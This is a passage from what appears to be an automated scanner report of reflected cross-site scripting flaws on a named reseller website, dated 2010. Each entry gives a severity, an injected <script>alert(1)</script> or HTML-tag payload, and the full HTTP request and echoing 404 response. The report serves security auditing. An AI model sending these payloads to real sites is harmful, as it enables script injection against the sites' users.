<p>The requested URL /detail/4/rating.php/173d2<script>alert(1)</script>a05e87559374cdfba?id=4&rating=5 was not found on this server.</p>
...[SNIP]...

2.2737. http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/reseller-targetdomain-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4a913<script>alert(1)</script>01e1251bf5d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4a913<script>alert(1)</script>01e1251bf5d/4/reseller-targetdomain-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4a913<script>alert(1)</script>01e1251bf5d/4/reseller-targetdomain-com.html was not found on this server.</p>
...[SNIP]...

2.2738. http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/reseller-targetdomain-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 53bc8<script>alert(1)</script>5eb6cd2b67d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/53bc8<script>alert(1)</script>5eb6cd2b67d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/53bc8<script>alert(1)</script>5eb6cd2b67d was not found on this server.</p>
...[SNIP]...

2.2739. http://www.resellerbase.com/detail/4/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ca9b7<script>alert(1)</script>7fae60f06da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailca9b7<script>alert(1)</script>7fae60f06da/4/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailca9b7<script>alert(1)</script>7fae60f06da/4/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2740. http://www.resellerbase.com/detail/4/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d76d5<script>alert(1)</script>42007c6ea23 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4d76d5<script>alert(1)</script>42007c6ea23/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4d76d5<script>alert(1)</script>42007c6ea23/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2741. http://www.resellerbase.com/detail/4/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 988ae<script>alert(1)</script>bcb364a9bf1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/search.php988ae<script>alert(1)</script>bcb364a9bf1?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/search.php988ae<script>alert(1)</script>bcb364a9bf1?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2742. http://www.resellerbase.com/detail/4/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/4/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 5a96f<a>0d69808efe1 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/4/search.php?keyword=search...&Submit3=Search5a96f<a>0d69808efe1&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/search.php?keyword=search...&Submit3=Search5a96f<a>0d69808efe1&opt=2 was not found on this server.</p>
...[SNIP]...

2.2743. http://www.resellerbase.com/detail/4/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/4/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 68996<a>a2ecc8bed43 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/4/search.php?keyword=search...68996<a>a2ecc8bed43&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/search.php?keyword=search...68996<a>a2ecc8bed43&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2744. http://www.resellerbase.com/detail/4/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 445b3<script>alert(1)</script>702b6d5f3e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/search.php?keyword=search...&Submit3=Search&opt=2&445b3<script>alert(1)</script>702b6d5f3e1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/search.php?keyword=search...&Submit3=Search&opt=2&445b3<script>alert(1)</script>702b6d5f3e1=1 was not found on this server.</p>
...[SNIP]...

2.2745. http://www.resellerbase.com/detail/4/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/4/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 4d7a2<a>56878e76282 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/4/search.php?keyword=search...&Submit3=Search&opt=24d7a2<a>56878e76282 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/search.php?keyword=search...&Submit3=Search&opt=24d7a2<a>56878e76282 was not found on this server.</p>
...[SNIP]...

2.2746. http://www.resellerbase.com/detail/4/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 69004<script>alert(1)</script>84a7a60ac9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail69004<script>alert(1)</script>84a7a60ac9a/4/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail69004<script>alert(1)</script>84a7a60ac9a/4/themes/ was not found on this server.</p>
...[SNIP]...

2.2747. http://www.resellerbase.com/detail/4/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f9e5e<script>alert(1)</script>2a40d0094e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4f9e5e<script>alert(1)</script>2a40d0094e0/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4f9e5e<script>alert(1)</script>2a40d0094e0/themes/ was not found on this server.</p>
...[SNIP]...

2.2748. http://www.resellerbase.com/detail/4/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9991d<script>alert(1)</script>3725d9b25cd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes9991d<script>alert(1)</script>3725d9b25cd/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes9991d<script>alert(1)</script>3725d9b25cd/ was not found on this server.</p>
...[SNIP]...

2.2749. http://www.resellerbase.com/detail/4/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 43490<script>alert(1)</script>ca44b3f86c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/?43490<script>alert(1)</script>ca44b3f86c0=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/?43490<script>alert(1)</script>ca44b3f86c0=1 was not found on this server.</p>
...[SNIP]...

2.2750. http://www.resellerbase.com/detail/4/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5ed74<script>alert(1)</script>d99953cd2e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5ed74<script>alert(1)</script>d99953cd2e2/4/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5ed74<script>alert(1)</script>d99953cd2e2/4/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2751. http://www.resellerbase.com/detail/4/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 66acd<script>alert(1)</script>5bd907d3560 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/466acd<script>alert(1)</script>5bd907d3560/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/466acd<script>alert(1)</script>5bd907d3560/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2752. http://www.resellerbase.com/detail/4/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cf154<script>alert(1)</script>21f61561a02 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themescf154<script>alert(1)</script>21f61561a02/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themescf154<script>alert(1)</script>21f61561a02/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2753. http://www.resellerbase.com/detail/4/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 26da0<script>alert(1)</script>6555e8f7fcb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos26da0<script>alert(1)</script>6555e8f7fcb/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos26da0<script>alert(1)</script>6555e8f7fcb/ was not found on this server.</p>
...[SNIP]...

2.2754. http://www.resellerbase.com/detail/4/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c47ce<script>alert(1)</script>df9e5a081a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/?c47ce<script>alert(1)</script>df9e5a081a3=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/?c47ce<script>alert(1)</script>df9e5a081a3=1 was not found on this server.</p>
...[SNIP]...

2.2755. http://www.resellerbase.com/detail/4/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2f2d8<script>alert(1)</script>b6cb841fa26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2f2d8<script>alert(1)</script>b6cb841fa26/4/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2f2d8<script>alert(1)</script>b6cb841fa26/4/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2756. http://www.resellerbase.com/detail/4/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 48c5c<script>alert(1)</script>24dfe5f0438 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

